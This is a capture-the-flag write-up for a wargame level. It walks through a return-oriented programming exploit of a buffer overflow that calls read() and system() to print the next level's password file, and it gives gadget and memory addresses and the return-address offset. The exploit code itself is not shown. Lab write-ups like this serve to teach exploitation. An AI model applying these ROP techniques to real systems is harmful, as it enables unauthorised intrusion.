Try the challenge thoroughly before reading the write-up. Otherwise, it's your loss.
We ssh to [email protected] and authenticate using the password we had obtained after solving the previous level.
Recap of previous level.
The recap of the previous level showcases a different solution to mine. Also, it has some neat tricks to figure out if your shellcode is being mangled or not using tracepoint/breakpoint trap. Definitely check it out!
They’re tired of coming up with welcome messages. Oh, well!
So, the challenge binary just takes in input, that’s it.
There’s a buffer overflow vulnerability, but the binary is NX/DEP protected. Go ROP, go!
It was a basic return oriented programming based exploit.
Our goal: call system() with the address of ‘cat /home/level12/.pass’ as argument.
Figure out the address of read() and system() function and overwrite the return address with the address of read().
Figure out a memory location to which the input (‘cat /home/level12/.pass’) would be read to.
Figure out the address of a ROP gadget for pop, pop, pop ret.
Call system with the address where our input has been stored.
Figuring out the address of read() and system():
We open up the binary in gdb and,
Figure out a memory address to write to:
We need to write to some place in memory which can be written to, and can also hold our data. The .dynamic section is an ideal choice.
So, we’ll be writing to the address 0x080495ec
We need the ROP gadget for pop, pop, ret.
Examining the disassembly:
Therefore the ROP gadget we’ll be using is at 0x804849d
Putting it all together
We easily figure out that the return address is at an offset of 28 from the input.
Our goal is to have the stack look like this after we successfully redirect code execution to the read() function through the buffer overflow:
The final exploit code is, therefore:
And Voila! I got the password to the next level. I am not revealing the password here so that the readers try the challenge on their own.
Another solution using the ROP module of pwntools(which unfortunately is not installed on the gracker machine) is (tested on local machine):